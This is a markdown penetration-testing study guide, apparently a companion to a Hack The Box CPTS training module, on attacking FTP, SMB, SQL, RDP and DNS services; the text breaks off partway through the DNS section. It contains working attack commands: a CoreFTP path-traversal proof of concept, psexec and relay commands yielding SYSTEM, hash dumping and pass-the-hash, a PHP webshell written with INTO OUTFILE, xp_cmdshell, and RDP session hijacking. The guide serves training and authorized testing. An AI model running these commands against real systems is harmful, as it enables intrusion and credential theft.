attacking-common-services-guide.md (45434B)
1 --- 2 title: "Attacking Common Services — Full Guide" 3 description: "Detailed CPTS walkthrough for enumerating and exploiting the network services that dominate internal and perimeter networks: FTP, SMB, SQL (MySQL/MSSQL), RDP, DNS, and email (SMTP/POP3/IMAP) — anonymous access, default creds, spraying, misconfigurations, and the module's worked CVEs, framed by the Source → Process → Privileges → Destination model." 4 category: pentest-workflow 5 subcategory: "Companion Guides" 6 order: 24 7 tags: ["htb", "cpts", "attacking-common", "services", "ftp", "smb", "mssql", "mysql", "rdp", "dns", "smtp", "pop3", "imap", "responder", "pass-the-hash", "subdomain-takeover", "pentest-workflow"] 8 tools: ["nmap", "smbclient / smbmap / rpcclient / enum4linux-ng", "netexec (nxc) / crackmapexec", "impacket (psexec/smbexec/atexec/ntlmrelayx/mssqlclient/smbserver)", "responder", "hashcat", "medusa / hydra / crowbar", "mysql / sqsh / sqlcmd", "xfreerdp / rdesktop", "dig / fierce / subfinder", "swaks / smtp-user-enum / o365spray", "ettercap / bettercap"] 9 difficulty: intermediate 10 updated: "2026-09-16" 11 source: "vault:HackTheBox/Academy/CPTS Path/11-Attacking-Common-Services" 12 --- 13 14 [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Field manual](/sheets/pentest-workflow/network-service-attack-manual) · [Applications guide →](/sheets/pentest-workflow/attacking-common-applications-guide) 15 16 # Attacking Common Services — Full Guide `fas:ClipboardList` 17 18 > [!dashboard] What this is 19 > The long-form companion to the Attacking Common Services cheat sheet. The cheat sheet is the card you keep open during a box; this guide is the walkthrough that explains *why* each step works, section by section, across the whole CPTS module. Reach for the cheat sheet mid-engagement and this guide when you're learning the material or writing it up. For the broader cross-module field reference (NFS, Kerberos, WinRM, SNMP, SSH, chaining, cleanup) see the [Network Service Attack Manual](/sheets/pentest-workflow/network-service-attack-manual). 20 21 Common services are the plumbing every network runs on: a file share, a database, a mail server, a remote-desktop endpoint, a DNS resolver. They are rarely glamorous and almost never the thing a defender hardens first, which is exactly why they land footholds. A company patches its browsers and hardens its domain controllers, then leaves an FTP root that accepts `anonymous`, an MSSQL instance still running `xp_cmdshell` as a service account, or an SMB server that answers a null session and hands over its share list for free. 22 23 Every service in this module answers to the same loop. Learn the loop rather than memorising six unrelated exploits: 24 25 <figure class="flow plate corners"> 26 <figcaption class="flow__cap"><span class="flow__kind">Common-services attack loop</span><span class="flow__dir">TD</span></figcaption> 27 <div class="flow__body"> 28 <div class="flow__diagram" data-dir="td"> 29 <div class="flow-rank"><div class="flow-node is-entry">Enumerate the service<span class="sub">nmap -sC -sV · banner · version</span></div></div> 30 <div class="flow-edge"></div> 31 <div class="flow-rank"><div class="flow-node">Try anonymous / null access<span class="sub">(free, non-destructive, first)</span></div></div> 32 <div class="flow-edge"></div> 33 <div class="flow-rank"><div class="flow-node">Default → weak credentials<span class="sub">admin:admin · root:<blank> · service defaults</span></div></div> 34 <div class="flow-edge"></div> 35 <div class="flow-rank"><div class="flow-node">Reuse everything found<span class="sub">a filename, a mailbox string, a config value</span><span class="sub">as a candidate cred on every other service</span></div></div> 36 <div class="flow-edge"></div> 37 <div class="flow-rank"><div class="flow-node">Spray (lockout-aware)<span class="sub">one password, many users, spaced</span></div></div> 38 <div class="flow-edge"></div> 39 <div class="flow-rank"><div class="flow-node is-decision">Turn access into code or creds</div></div> 40 <div class="flow-branches"> 41 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">built-in feature</span></div><div class="flow-node">xp_cmdshell · WAR/webshell upload<span class="sub">SELECT ... INTO OUTFILE · tscon</span></div></div> 42 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">version CVE</span></div><div class="flow-node">CoreFTP · SMBGhost · BlueKeep<span class="sub">OpenSMTPD · Drupalgeddon-class</span></div></div> 43 </div> 44 <div class="flow-join"></div> 45 <div class="flow-rank"><div class="flow-node is-goal">Loot → feed credential hunting<span class="sub">and lateral movement</span></div></div> 46 </div> 47 </div> 48 </figure> 49 50 > [!danger]+ Authorized targets only 51 > `fas:TriangleExclamation` 52 > Everything here affects availability and integrity of real services. **Password spraying** can lock accounts, **NTLM relaying** authenticates as a real user, and the RCE CVEs are the sharp end — **BlueKeep can BSOD the host** and OpenSMTPD RCE runs as root. Run this only on engagements or labs where you hold explicit written permission, spray with the lockout policy in front of you, get sign-off before firing a memory-corruption exploit at anything a client cares about, and treat every recovered credential as sensitive evidence rather than something to paste into permanent notes. 53 54 --- 55 56 ## 1 · Interacting with common services `fas:Terminal` 57 58 Before attacking a service you have to be fluent in using it normally, from both a Windows and a Linux vantage point. Most "attacks" in this module are abuse of the same legitimate interaction patterns shown here — recognising the normal shape of SMB, SQL, and mail traffic is what lets you spot the abnormal (and therefore interesting) later. 59 60 > [!tip] Two shells on Windows 61 > `cmd.exe` runs native Windows commands only. PowerShell runs those *and* cmdlets, and gives you a real scripting language (`Get-ChildItem`, `Select-String`, `New-PSDrive`, `PSCredential` objects). Default to PowerShell for anything past a one-off `dir`. 62 63 **SMB from Windows.** Browse over a UNC path with no mapping, or map a drive with explicit creds and then treat it like local storage: 64 65 ```cmd 66 C:\htb> dir \\192.168.220.129\Finance\ 67 C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123 68 C:\htb> dir n: /a-d /s /b | find /c ":\" :: count files — gauge share size before searching 69 C:\htb> dir n:\*cred* /s /b :: filename search 70 C:\htb> findstr /s /i cred n:\*.* :: content search — leaks different things 71 ``` 72 73 **SMB from PowerShell.** Same idea, but composes into the pipeline. Build a `PSCredential` for non-interactive auth: 74 75 ```powershell 76 PS C:\htb> $password = ConvertTo-SecureString 'Password123' -AsPlainText -Force 77 PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential 'plaintext', $password 78 PS C:\htb> New-PSDrive -Name N -Root "\\192.168.220.129\Finance" -PSProvider FileSystem -Credential $cred 79 PS N:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List # PowerShell's grep 80 ``` 81 82 **SMB from Linux.** Mount it and it's just a directory — no SMB-specific tooling needed afterwards. Prefer a credentials file so the password stays out of shell history and `ps`: 83 84 ```bash 85 sudo apt install cifs-utils 86 sudo mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/creds 87 # creds file: username=plaintext / password=Password123 / domain=. 88 grep -rn /mnt/Finance/ -ie cred 89 ``` 90 91 **SQL clients.** Native CLIs plus one GUI worth keeping installed: 92 93 ```bash 94 sqsh -S 10.129.20.13 -U username -P Password123 # MSSQL from Linux (plaintext SQL auth only) 95 mysql -u username -pPassword123 -h 10.129.20.13 # MySQL from Linux 96 mssqlclient.py -p 1433 julio@10.129.203.7 # Impacket — supports NTLM hash / Kerberos 97 dbeaver & # free, cross-platform, multi-engine GUI 98 ``` 99 100 ```cmd 101 C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123 :: MSSQL from Windows 102 ``` 103 104 > [!info] Command breakdown 105 > - `sqsh`/`sqlcmd` are the native MSSQL CLIs; `mysql` is MySQL's. `mssqlclient.py` (Impacket) is the one to reach for when you hold an NTLM **hash** rather than a plaintext password — `sqsh`/`sqlcmd` can't do hash or Kerberos auth. 106 > - `dbeaver` speaks MySQL, MSSQL, PostgreSQL and more from one UI — the practical cross-platform substitute for SSMS (Windows-only) or MySQL Workbench. 107 108 **Mail clients.** Once you hold valid mailbox creds, a real client beats raw protocol commands for reading a mailbox: 109 110 ```bash 111 sudo apt-get install evolution 112 export WEBKIT_FORCE_SANDBOX=0 && evolution # if it dies with a bwrap sandbox error 113 ``` 114 115 > [!tip] Current tooling 116 > For SMB enumeration prefer **`enum4linux-ng`** (maintained Python rewrite) over the effectively-unmaintained Perl `enum4linux`. Impacket is under active Fortra maintenance and is the de-facto standard for scripted SMB/MSSQL interaction. 117 118 --- 119 120 ## 2 · The concept of attacks 121 122 Rather than memorising per-protocol exploits in isolation, decompose any vulnerability into four categories. The same cycle reappears for CoreFTP, SMBGhost, BlueKeep, subdomain takeover, and the OpenSMTPD RCE — once you can place a technique in this frame, spotting the analogue on a service you've never touched gets much faster. 123 124 <figure class="flow plate corners"> 125 <figcaption class="flow__cap"><span class="flow__kind">Source → Process → Privileges → Destination</span><span class="flow__dir">LR</span></figcaption> 126 <div class="flow__body"> 127 <div class="flow__diagram" data-dir="lr"> 128 <div class="flow-rank"><div class="flow-node is-entry">Source<span class="sub">code · libraries · config</span><span class="sub">APIs · user input</span></div></div> 129 <div class="flow-edge"></div> 130 <div class="flow-rank"><div class="flow-node">Process<span class="sub">the logic handling it</span><span class="sub">— most vulns live here</span></div></div> 131 <div class="flow-edge"></div> 132 <div class="flow-rank"><div class="flow-node">Privileges<span class="sub">SYSTEM/root · service acct · role</span><span class="sub">= blast radius</span></div></div> 133 <div class="flow-edge"></div> 134 <div class="flow-rank"><div class="flow-node is-goal">Destination<span class="sub">local (file/service)</span><span class="sub">or network (another host)</span></div></div> 135 </div> 136 </div> 137 </figure> 138 139 > [!info] The four categories 140 > - **Source** — where the triggering input originates: already-executed code, a library, static config, an API, or direct user input. Protocol is irrelevant here; an HTTP header injection and a buffer overflow both reduce to "code" as the source. 141 > - **Process** — how program logic handles that input. Most real vulnerabilities live here, because it's where a developer's assumptions about input turn out to be wrong. 142 > - **Privileges** — the rights the process runs with. This sets the blast radius, not the exploitability: a simple bug in a process running as SYSTEM/root is disproportionately dangerous. 143 > - **Destination** — where the result lands: a local file/service, or another host over the network. The cycle is deliberately linear; a full chain is usually an *initiation* cycle (get a foothold / leak something) plus a *trigger* cycle (turn it into RCE). 144 145 **Worked example — Log4j (CVE-2021-44228).** A crafted JNDI string in the HTTP `User-Agent` header (Source) is misparsed by the logging function instead of being logged as text (Process); logging typically runs with elevated rights (Privileges); the JNDI lookup reaches out to attacker infrastructure hosting a malicious Java class (Destination). A second cycle then pulls that class back (Source), executes it (Process), inherits the same rights (Privileges), and opens a shell back to the attacker (Destination). Two four-step cycles chained — initiation, then trigger — which is the shape of nearly every exploit chain later in this module. 146 147 --- 148 149 ## 3 · Service misconfigurations `fas:Terminal` 150 151 Misconfigurations, not zero-days, are the everyday bread and butter of internal tests. Four categories recur across almost every service here: 152 153 1. **Weak / default authentication** — `admin:admin`, `admin:password`, blank passwords left after install, or a weak password set "to change later." 154 2. **Anonymous authentication** — access with no credentials at all. Common on FTP and SMB, occasionally on SQL. 155 3. **Misconfigured access rights** — accounts with permissions beyond their role (an upload-only FTP account that can also read every document). Subtle, because the credentials are "correct" but the account is over-privileged. 156 4. **Unnecessary defaults** — sample files, admin/debug interfaces, verbose errors left enabled because they ship on by default. 157 158 > [!tip] The order to test in 159 > After a banner grab, check **default credentials before anything sophisticated** — cheap to try, disproportionately effective. If defaults fail, run the common weak combos (`admin:<blank>`, `root:12345678`, `administrator:Password`) before you reach for a full spray, and a spray before brute force. 160 161 OWASP's **A05:2021 – Security Misconfiguration** doubles as an offensive checklist and ready-made remediation language for the report: disable unneeded admin interfaces, turn off debug/stack traces in production, change default creds immediately, block directory listing and info disclosure, scan on a schedule, automate identical hardening across environments (different creds per environment), and strip unused features/sample apps. 162 163 --- 164 165 ## 4 · Finding sensitive information 166 167 Attacking common services is detective work: a single, apparently insignificant thing found on one service is frequently the key to a completely different one. The canonical worked chain from the module makes the point — an *empty file* is the whole foothold: 168 169 <figure class="flow plate corners"> 170 <figcaption class="flow__cap"><span class="flow__kind">One empty filename → RCE on a different box</span><span class="flow__dir">LR</span></figcaption> 171 <div class="flow__body"> 172 <div class="flow__diagram" data-dir="lr"> 173 <div class="flow-rank"><div class="flow-node is-entry">Anonymous FTP<span class="sub">finds empty file 'johnsmith'</span></div></div> 174 <div class="flow-edge"></div> 175 <div class="flow-rank"><div class="flow-node">johnsmith:johnsmith<span class="sub">on FTP → fails</span></div></div> 176 <div class="flow-edge"></div> 177 <div class="flow-rank"><div class="flow-node">Same creds on email<span class="sub">→ succeeds</span></div></div> 178 <div class="flow-edge"></div> 179 <div class="flow-rank"><div class="flow-node">Search mailbox for 'password'<span class="sub">→ finds MSSQL creds</span></div></div> 180 <div class="flow-edge"></div> 181 <div class="flow-rank"><div class="flow-node is-goal">MSSQL → xp_cmdshell<span class="sub">→ RCE on the DB server</span></div></div> 182 </div> 183 </div> 184 </figure> 185 186 The operationally useful takeaway is the *sequencing*: try anonymous access broadly across every discovered service first (cheap, fast, non-destructive), then use anything found — even an empty file's name — as a candidate username or password against every other service, before falling back to brute force or exploitation. Searching any mailbox you get into for the literal string `password` is a surprisingly high-yield move. Tag credential candidates somewhere you can cross-reference them (Obsidian, Ghostwriter, Dradis) so a pivot doesn't get lost in terminal scrollback. 187 188 --- 189 190 ## 5 · Attacking FTP `fas:Terminal` — TCP/21 191 192 FTP is a plaintext file-transfer protocol. Two misconfigurations dominate (anonymous auth, over-permissive access rights), and a modern CVE shows even a maintained product can carry a trivial arbitrary-write bug. 193 194 **Enumerate.** `-sC` runs `ftp-anon`, which both tests anonymous login and lists directory contents inline: 195 196 ```bash 197 sudo nmap -sC -sV -p 21 192.168.2.142 198 # | ftp-anon: Anonymous FTP login allowed (FTP code 230) 199 # | drwxr-srwt 2 1170 924 2048 Jul 19 18:48 incoming [NSE: writeable] 200 # 221/tcp banner e.g. vsFTPd 2.3.4 → note the exact version for CVE lookup 201 ``` 202 203 The `[NSE: writeable]` tag flags a directory the anonymous session can write to — a direct route to webshell upload if that same FTP root is served over HTTP elsewhere on the host. 204 205 **Anonymous login and file ops.** Try `anonymous` with a blank/arbitrary password even without a prior `ftp-anon` hit — the script occasionally misses custom configs: 206 207 ```bash 208 ftp 192.168.2.142 # Name: anonymous · Password: <blank> 209 ftp> ls # navigate like Linux: ls / cd 210 ftp> get flag.txt # get/mget download · put/mput upload · help lists client commands 211 ``` 212 213 **Brute force / spray.** `-u` a single known user, `-U` a list; spraying (one password, many users) is the safer default where lockout thresholds are unknown: 214 215 ```bash 216 medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp 217 # ACCOUNT FOUND: [ftp] User: fiona Password: family [SUCCESS] 218 hydra -L users.txt -P rockyou.txt ftp://10.129.203.7 # often faster (better connection reuse) 219 ``` 220 221 **FTP bounce.** The `PORT` command can make an internet-facing FTP server proxy a scan to a third, internal host you can't reach directly — turning it into a blind port scanner. Modern daemons block this by default, so a positive result is itself a reportable misconfiguration: 222 223 ```bash 224 nmap -Pn -v -n -p80 -b anonymous:password@172.17.0.2 172.17.0.2 225 # Login credentials accepted by FTP server! → 80/tcp open http (scanned via the proxy) 226 ``` 227 228 **CoreFTP arbitrary file write (CVE-2022-22836).** The HTTP `PUT` handler fails to normalise `../`, so an authenticated `curl` writes a file anywhere the service account can: 229 230 ```bash 231 curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<pass> \ 232 --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops 233 # C:\> type C:\whoops → PoC. 234 ``` 235 236 Mapped to the model: user-controlled path + escape chars (Source) → the traversal check validated only the *starting* directory, not the resolved path (Process/Privileges) → arbitrary file on disk (Destination). `--path-as-is` stops curl from collapsing the `../` before it's sent. 237 238 --- 239 240 ## 6 · Attacking SMB `fas:Terminal` — TCP/445, 139 241 242 SMB (Server Message Block) is the largest attack surface in the module: file/printer/named-pipe sharing over TCP/445 (or 139 with legacy NetBIOS), with Samba as the Linux implementation. The path runs from unauthenticated enumeration all the way to a SYSTEM shell. 243 244 <figure class="flow plate corners"> 245 <figcaption class="flow__cap"><span class="flow__kind">SMB: null session to SYSTEM</span><span class="flow__dir">TD</span></figcaption> 246 <div class="flow__body"> 247 <div class="flow__diagram" data-dir="td"> 248 <div class="flow-rank"><div class="flow-node is-entry">nmap -p139,445 -sC -sV<span class="sub">check smb2-security-mode (signing)</span></div></div> 249 <div class="flow-edge"></div> 250 <div class="flow-rank"><div class="flow-node is-decision">Null session allowed?</div></div> 251 <div class="flow-branches"> 252 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">yes</span></div><div class="flow-node">smbclient / smbmap / rpcclient -N<span class="sub">shares · users · groups · policy</span></div></div> 253 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">no</span></div><div class="flow-node">Password spray<span class="sub">nxc / crackmapexec</span></div></div> 254 </div> 255 <div class="flow-join"></div> 256 <div class="flow-rank"><div class="flow-node">Valid admin-equivalent creds or hash</div></div> 257 <div class="flow-edge"></div> 258 <div class="flow-rank"><div class="flow-node is-goal">RCE (psexec/smbexec/atexec) · --sam dump · Pass-the-Hash<span class="sub">→ SYSTEM</span></div></div> 259 </div> 260 </div> 261 </figure> 262 263 **Enumerate.** `-sV -sC` reveal the implementation, version, NetBIOS name, and — critically — whether message signing is enforced: 264 265 ```bash 266 sudo nmap 10.129.14.128 -sV -sC -p139,445 267 # 445/tcp open netbios-ssn Samba smbd 4.6.2 (Samba ⇒ Linux target) 268 # smb2-security-mode: Message signing enabled but not required ← relaying is possible 269 ``` 270 271 Signing *not required* is a prerequisite for the NTLM relay in step 8 — always note it during initial enumeration. 272 273 **Null session share / RPC enumeration.** A null session is an SMB connection with no username or password; if it works, treat it as equivalent to low-priv creds for enumeration: 274 275 ```bash 276 smbclient -N -L //10.129.14.128 # list shares (ADMIN$, C$, custom shares, IPC$) 277 smbmap -H 10.129.14.128 # same, but with per-share R/W permission columns 278 smbmap -H 10.129.14.128 --download "notes\note.txt" # transfer without an interactive session 279 rpcclient -U'%' 10.10.110.17 # null session RPC shell 280 rpcclient $> enumdomusers # user:[mhope] rid:[0x641] ... 281 ./enum4linux-ng.py 10.10.11.45 -A -C # one-pass domain/users/groups/shares/policy 282 ``` 283 284 **Spray.** One password across a user list avoids the lockout risk of many-passwords-per-account; `--local-auth` targets non-domain accounts; `(Pwn3d!)` marks confirmed local admin: 285 286 ```bash 287 nxc smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth 288 # [+] WIN7BOX\jurena:Company01! (Pwn3d!) 289 # --continue-on-success keeps going past the first hit 290 ``` 291 292 > [!tip] CrackMapExec → NetExec 293 > **NetExec (`nxc`)** is the actively developed successor to CrackMapExec — same syntax family, more protocol modules. Every `crackmapexec smb ...` in older writeups maps 1:1 to `nxc smb ...`. Examples below use `nxc`; the classic `crackmapexec` name still works where CME is installed. 294 295 **Remote code execution.** With admin-equivalent creds, three Impacket methods, each landing a SYSTEM shell by a different mechanism: 296 297 ```bash 298 impacket-psexec administrator:'Password123!'@10.10.110.17 # uploads a service to ADMIN$, runs via SCM 299 # C:\Windows\system32> whoami → nt authority\system 300 nxc smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec 301 ``` 302 303 `impacket-smbexec` avoids RemComSvc and works without a writable share (it stands up a local SMB server for output); `impacket-atexec` runs through Task Scheduler instead of the SCM — useful when service creation is blocked or heavily logged. 304 305 **Dump SAM hashes.** Sweep a subnet for who's logged on, then dump the local NTLM hashes: 306 307 ```bash 308 nxc smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users # find where a DA is sitting 309 nxc smb 10.10.110.17 -u administrator -p 'Password123!' --sam 310 # Administrator:500:aad3b435...:2b576acbe6bcfda7294d6bd18041b8fe::: 311 ``` 312 313 **Pass-the-Hash.** Windows challenge-response only needs the hash, never the plaintext — so a dumped or captured NTLM hash is immediately usable for lateral movement. PtH is a property of NTLM auth, not a tool feature; it works identically with Impacket, smbmap, and nxc: 314 315 ```bash 316 nxc smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE 317 # [+] WIN7BOX\Administrator:2B57... (Pwn3d!) 318 ``` 319 320 **Forced authentication + relay (Responder / ntlmrelayx).** Responder answers LLMNR/NBT-NS/mDNS broadcasts (which fire whenever a client mistypes a hostname or DNS fails) *as* the server the victim wanted, capturing a NetNTLMv2 hash. Crack it, or relay it live: 321 322 ```bash 323 sudo responder -I ens33 324 # [SMB] NTLMv2-SSP Hash : demouser::WIN7BOX:997b18cc61099ba2:... 325 hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt # 5600 = NetNTLMv2 326 327 # If cracking fails, relay instead. Turn off Responder's own SMB server first (SMB = Off): 328 impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 329 # add -c '<cmd>' to run a command on the relay target instead of the default SAM dump 330 ``` 331 332 Relaying only works where SMB signing is *not enforced* — the check you made during enumeration. This is the same Source→Process→Privileges→Destination cycle as the SQL `xp_dirtree` hash steal in the next section, just triggered by a broadcast name-resolution mistake instead of a SQL stored procedure. 333 334 **SMBGhost (CVE-2020-0796)** — concept only. An integer overflow in SMBv3.1.1 compression negotiation on Windows 10 1903/1909: an oversized compressed message overflows a size-check integer, writing past the buffer and overwriting adjacent instructions, which the attacker shapes to redirect execution. Kernel-level exploit development, outside this module's scope, but a clean example of the model at the memory-corruption layer. 335 336 --- 337 338 ## 7 · Attacking SQL databases `fas:Terminal` — MSSQL 1433 · MySQL 3306 339 340 Databases store credentials, PII, and business data, and often run with excessive service-account privileges — high value on both counts. MSSQL and MySQL both speak SQL/T-SQL once you're in. 341 342 <figure class="flow plate corners"> 343 <figcaption class="flow__cap"><span class="flow__kind">SQL access to OS command execution</span><span class="flow__dir">TD</span></figcaption> 344 <div class="flow__body"> 345 <div class="flow__diagram" data-dir="td"> 346 <div class="flow-rank"><div class="flow-node is-entry">Authenticate<span class="sub">mysql · sqsh · sqlcmd · mssqlclient.py</span></div></div> 347 <div class="flow-edge"></div> 348 <div class="flow-rank"><div class="flow-node is-decision">Privilege held?</div></div> 349 <div class="flow-branches"> 350 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MSSQL sysadmin</span></div><div class="flow-node">xp_cmdshell → RCE</div></div> 351 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">MySQL FILE</span></div><div class="flow-node">SELECT ... INTO OUTFILE → webshell</div></div> 352 <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">IMPERSONATE granted</span></div><div class="flow-node">EXECUTE AS LOGIN='sa'<span class="sub">→ effective sysadmin</span></div></div> 353 </div> 354 <div class="flow-join"></div> 355 <div class="flow-rank"><div class="flow-node is-goal">OS command execution as the SQL service account<span class="sub">or pivot via linked server</span></div></div> 356 </div> 357 </div> 358 </figure> 359 360 > [!info] MSSQL auth modes 361 > **Windows auth** (default) ties SQL Server to Windows/AD — already-authenticated users need no further creds. **Mixed mode** additionally allows SQL-native username/password accounts. Specifying a domain/hostname on connect selects Windows auth; omitting it assumes SQL auth. In `sqsh`, a leading `.\` (`.\\julio`) explicitly forces a *local* SQL account. 362 363 **Enumerate.** MSSQL defaults to TCP/1433 (a "hidden" instance can sit on 2433); MySQL to TCP/3306. Nmap's `ms-sql-*` scripts leak version, hostname, and domain with no auth: 364 365 ```bash 366 nmap -Pn -sV -sC -p1433,3306 10.10.10.125 367 # 1433/tcp ms-sql-s Microsoft SQL Server 2017 ... DNS_Computer_Name: mssql-test.HTB.LOCAL 368 ``` 369 370 **Connect and enumerate data.** Every batch in `sqsh`/`sqlcmd` needs `GO` on its own line: 371 372 ```sql 373 -- MySQL 374 SHOW DATABASES; USE htbusers; SHOW TABLES; SELECT * FROM users; 375 -- MSSQL (sqsh/sqlcmd) 376 SELECT name FROM master.dbo.sysdatabases 377 GO 378 SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES 379 GO 380 ``` 381 382 Ignore the system DBs when hunting data — MySQL `mysql`/`information_schema`/`performance_schema`/`sys`, MSSQL `master`/`msdb`/`model`/`resource`/`tempdb` — they fingerprint the engine but hold no company data. 383 384 **Command execution — xp_cmdshell (MSSQL).** An extended stored procedure that spawns a Windows process as the SQL service account. Disabled by default, re-enabled trivially with sysadmin: 385 386 ```sql 387 xp_cmdshell 'whoami' 388 GO 389 -- no service\mssql$sqlexpress 390 -- if disabled: 391 EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; 392 EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; 393 GO 394 ``` 395 396 It runs **synchronously** — control returns only when the command finishes, worth remembering for long-running payloads. MySQL has no direct equivalent but supports UDFs that can run C/C++; rare in production, worth checking. 397 398 **Read / write local files.** Note the asymmetric MSSQL defaults — reads work out of the box, writes need Ole Automation enabled first: 399 400 ```sql 401 -- MySQL (needs FILE priv + empty secure_file_priv; check SHOW VARIABLES LIKE 'secure_file_priv') 402 SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; 403 SELECT LOAD_FILE("/etc/passwd"); 404 -- MSSQL read (no special config) 405 SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS x 406 GO 407 ``` 408 409 Writing a PHP one-liner straight into the web root turns a file-write primitive into RCE if the box also serves web content. 410 411 **Privilege escalation via IMPERSONATE.** A self-contained privesc *inside* SQL Server — worth checking on every MSSQL foothold, even without OS access. Find who you can impersonate, then become them (no password needed): 412 413 ```sql 414 SELECT DISTINCT b.name FROM sys.server_permissions a 415 INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id 416 WHERE a.permission_name = 'IMPERSONATE' 417 GO -- name: sa 418 EXECUTE AS LOGIN = 'sa' 419 SELECT SYSTEM_USER 420 SELECT IS_SRVROLEMEMBER('sysadmin') -- 1 ⇒ full sysadmin; xp_cmdshell now available 421 GO -- REVERT switches back 422 ``` 423 424 **Linked-server pivoting.** Pass-through T-SQL to a second SQL instance; if the linked server's stored creds have sysadmin, you own that box too. Double single quotes inside the query to escape: 425 426 ```sql 427 SELECT srvname, isremote FROM sysservers 428 GO 429 EXECUTE('select @@servername, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] 430 GO 431 ``` 432 433 **Steal the service-account hash (xp_dirtree / xp_subdirs).** These procedures reach a path over SMB — point them at your box and the MSSQL service account authenticates to you: 434 435 ```bash 436 sudo impacket-smbserver share ./ -smb2support # or: sudo responder -I tun0 437 ``` 438 ```sql 439 EXEC master..xp_dirtree '\\10.10.110.17\share\' 440 GO 441 -- [SMB] NTLMv2-SSP Hash : SRVMSSQL\demouser::WIN7BOX:5e3ab1c4380b94a1:... 442 ``` 443 444 `xp_subdirs` sometimes errors with access-denied even though the authentication (and hash capture) still completes — a stored-procedure error is not proof the technique failed. Same forced-auth cycle as SMB Responder, triggered from inside SQL. 445 446 --- 447 448 ## 8 · Attacking RDP `fas:Terminal` — TCP/3389 449 450 RDP is Microsoft's graphical remote-admin protocol, heavily used by sysadmins and MSPs — a prime target. Account lockout policies apply, so spray, don't brute force. 451 452 **Enumerate.** `ms-wbt-server` confirms RDP; `rdp-ntlm-info`/`rdp-enum-encryption` add domain/cipher fingerprinting: 453 454 ```bash 455 nmap -Pn -p3389 --script rdp-ntlm-info 192.168.2.143 456 # 3389/tcp open ms-wbt-server 457 ``` 458 459 **Spray.** Crowbar is purpose-built for RDP/VNC; Hydra's `rdp` module is flagged experimental upstream — reduce parallelism and add wait time: 460 461 ```bash 462 crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' 463 # RDP-SUCCESS : 192.168.220.142:3389 - administrator:password123 464 hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp -t 1 -W 3 465 ``` 466 467 **Log in.** `xfreerdp` is the maintained client of choice (dynamic resolution, clipboard, drive redirection, Pass-the-Hash) over the stagnant `rdesktop`: 468 469 ```bash 470 xfreerdp /v:<target> /u:<user> /p:'<password>' # accept the self-signed cert warning 471 ``` 472 473 **Session hijacking (local admin → SYSTEM → hijack).** `tscon.exe` reconnects another user's session by ID with no password — but only from a SYSTEM context. Services run as `Local System`, so create one whose binpath is the `tscon` call: 474 475 ```cmd 476 C:\htb> query user 477 # juurena rdp-tcp#13 1 Active · lewen rdp-tcp#14 2 Active 478 C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13" 479 C:\htb> net start sessionhijack :: reconnects you to lewen's (id 2) session 480 ``` 481 482 Confirmed **broken on Server 2019+** — Microsoft restricted the technique; check the target build first. 483 484 **Pass-the-Hash via Restricted Admin Mode.** Disabled by default; enabling it needs prior local admin. Then `xfreerdp /pth:` authenticates with the raw NTLM hash — the RDP equivalent of SMB PtH: 485 486 ```cmd 487 C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f 488 ``` 489 ```bash 490 xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9 491 ``` 492 493 **BlueKeep (CVE-2019-0708)** — concept only. Attacker-manipulated data during the RDP virtual-channel settings exchange (Source) triggers a Use-After-Free in a kernel function running as `LocalSystem` (Process/Privileges), and the trigger cycle writes and executes attacker instructions in the freed memory for network RCE (Destination). 494 495 > [!warning] Stability risk 496 > BlueKeep can crash the target with a BSOD and has caused real instability in the wild. For labs, Metasploit's `rdp_scanner` aux and `cve_2019_0708_bluekeep_rce` modules are the vetted route. Against anything a client cares about, get explicit sign-off before firing. 497 498 --- 499 500 ## 9 · Attacking DNS `fas:Terminal` — UDP/53, TCP/53 501 502 DNS underpins nearly every network application, which makes it a consistently high-value surface. Three distinct vectors here have very different reach: zone transfer and subdomain takeover are remotely exploitable; DNS spoofing needs local L2 adjacency. 503 504 **Zone transfer (AXFR).** A zone transfer copies a chunk of the DNS database for replication and requires no auth by protocol design. A server that permits AXFR from any client leaks its entire internal namespace in one request: 505 506 ```bash 507 nmap -p53 -Pn -sV -sC 10.10.110.213 # 53/tcp open domain ISC BIND 9.11.3 508 dig AXFR @ns1.inlanefreight.htb inlanefreight.htb 509 # admin.inlanefreight.htb. IN A 10.129.110.21 510 # hr.inlanefreight.htb. IN A 10.129.110.25 ← internal 